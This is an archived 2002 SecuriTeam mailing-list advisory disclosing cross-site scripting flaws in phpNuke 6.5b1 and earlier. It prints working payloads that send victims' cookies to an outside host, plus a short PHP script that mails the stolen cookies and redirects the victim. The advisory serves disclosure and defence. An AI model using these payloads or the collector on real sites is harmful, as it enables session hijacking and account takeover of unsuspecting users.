[NEWS] Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

From: support@securiteam.com
Date: 11/24/02

  • Next message: support@securiteam.com: "[NT] BadBlue XSS/Information Disclosure Vulnerabilities" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 24 Nov 2002 22:23:56 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Multiple phpNuke Modules Vulnerable to Cross-Site Scripting
    ------------------------------------------------------------------------

    SUMMARY

    phpNuke is a popular, and very complex content manager that runs on UNIX,
    Mac, and Windows systems with a MySQL or similar backend database. Many of
    the content manager's modules contain serious vulnerabilities that allow
    attackers to hijack or disable user accounts, and possibly gain
    administrative privileges. Gaining such privileges could likely assist
    further compromise of the susceptible system.

    DETAILS

    Vulnerable systems:
     * phpNuke 6.5b1 and prior

    I. Search Module Vulnerability

    The search module of phpNuke applies absolutely no filtering at all when
    returning the "Results for x..." page, and as a result is susceptible to
    cross-site scripting via a simple query such as:

    <SCR*IPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurph
    y@kc.rr.com&ref="+document.URL+"cookie="+document.cookie;

    II. Multiple Module Extended Tag Vulnerabilities
    phpNuke does a decent job of stripping known malicious tags, but doesn't
    take into account the fact that even "safe" tags can have malicious
    properties. This enables cross-site scripting against the PM module,
    Discussion module, News module, etc. so basically any module that accepts
    user input for an article, message, or comment, can be attacked with HTML
    such as:

    <B
    STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fet
    ch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'cookie=\'+document.c
    ookie'))">Bold text -- or an attack?</B>
    <B
    ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurp
    hy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
    <B
    ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=matt
    murphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Keep
    Away!</B>

    Exploit Script
    <?php
    error_reporting(0);
    $redir_ref = TRUE;
    mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
    if ($redir_ref) {
    header("Location: ".urlencode($_GET["ref"]));
    }
    ?>

    Vendor Response:
    Matthew Murphy has contacted www.phpnuke.org through a private message,
    but if anyone knows a more reliable contact for them, please do use it, as
    this is not likely the only route of contact. Matthew Murphy sent a PM to
    "nukelite" with an example exploit in it. Matthew Murphy expects that
    future BETA releases will eliminate this vulnerability.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mattmurphy@kc.rr.com>
    Matthew Murphy.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages